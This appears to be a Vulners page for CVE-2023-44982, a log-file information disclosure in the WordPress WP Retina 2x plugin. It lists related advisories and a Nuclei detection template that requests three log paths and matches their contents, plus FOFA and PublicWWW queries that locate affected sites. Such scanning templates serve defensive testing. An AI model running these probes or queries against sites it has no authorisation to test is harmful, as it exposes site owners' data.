| Reporter | Title | Published | Views | Family All 13 |
|---|---|---|---|---|
| CVE-2023-44982 | 12 Jan 202413:46 | – | circl | |
| WordPress plugin WP Retina 2x Information Disclosure Vulnerability | 18 Dec 202300:00 | – | cnnvd | |
| CVE-2023-44982 | 19 Dec 202300:03 | – | cve | |
| CVE-2023-44982 WordPress WP Retina 2x Plugin <= 6.4.5 is vulnerable to Sensitive Data Exposure | 19 Dec 202300:03 | – | cvelist | |
| EUVD-2023-49304 | 3 Oct 202520:07 | – | euvd | |
| CVE-2023-44982 | 19 Dec 202301:15 | – | nvd | |
| WordPress WP Retina 2x Plugin < 6.4.6 Information Disclosure Vulnerability | 22 Dec 202300:00 | – | openvas | |
| WordPress WP Retina 2x Plugin <= 6.4.5 is vulnerable to Sensitive Data Exposure | 28 Nov 202300:00 | – | patchstack | |
| Code injection | 19 Dec 202301:15 | – | prion | |
| PT-2023-29328 | 19 Dec 202300:00 | – | ptsecurity |
id: CVE-2023-44982
info:
name: WordPress Perfect Images (WP Retina 2x) < 6.4.6 - Sensitive Information Exposure
author: pussycat0x
severity: medium
description: |
Jordy Meow Perfect Images (Manage Image Sizes, Thumbnails, Replace, Retina) versions up to 6.4.5 contain a vulnerability that exposes sensitive information to unauthorized actors, letting attackers access confidential data, exploit requires no specific conditions.
impact: |
Unauthorized actors can access sensitive information, leading to privacy breaches and potential data misuse.
remediation: |
Update to version 6.4.6 or later.
reference:
- https://wpscan.com/vulnerability/aba0c4a1-e253-4b5b-b46d-239567567b16/
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N
cvss-score: 5.3
cve-id: CVE-2023-44982
cwe-id: CWE-200
epss-score: 0.01437
epss-percentile: 0.69934
metadata:
verified: true
max-request: 3
vendor: meowapps
product: perfect-images
framework: wordpress
publicwww-query: "/wp-content/plugins/wp-retina-2x/"
fofa-query: body="/wp-content/plugins/wp-retina-2x/"
tags: cve,cve2023,wordpress,wp-plugin,wp-retina-2x
http:
- method: GET
path:
- "{{BaseURL}}/wp-content/plugins/wp-retina-2x/classes/wp-retina-2x.log"
- "{{BaseURL}}/wp-content/uploads/wp-retina-2x.log"
- "{{BaseURL}}/wp-content/uploads/wp-retina-2x-logs.txt"
stop-at-first-match: true
matchers-condition: and
matchers:
- type: word
part: body
words:
- "RETINA"
- "PATH"
- "thumbnail"
- "wp-content"
- "Full-Size"
- "uploads"
condition: and
- type: regex
part: body
regex:
- '\d{4}-\d{2}-\d{2} \d{2}:\d{2}:\d{2}:'
- type: status
status:
- 200
# digest: 4a0a00473045022100a92ba8a6f62f18525fecd8103cbd9c01e2eaeea6b0d5113c0f72b6ca5ead4f8502201c93b2625394269abd931f50f6691d073dbe85cbd3a31a0735e69fa07c9d8fa0:922c64590222798bb761d5b6d8e72950Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation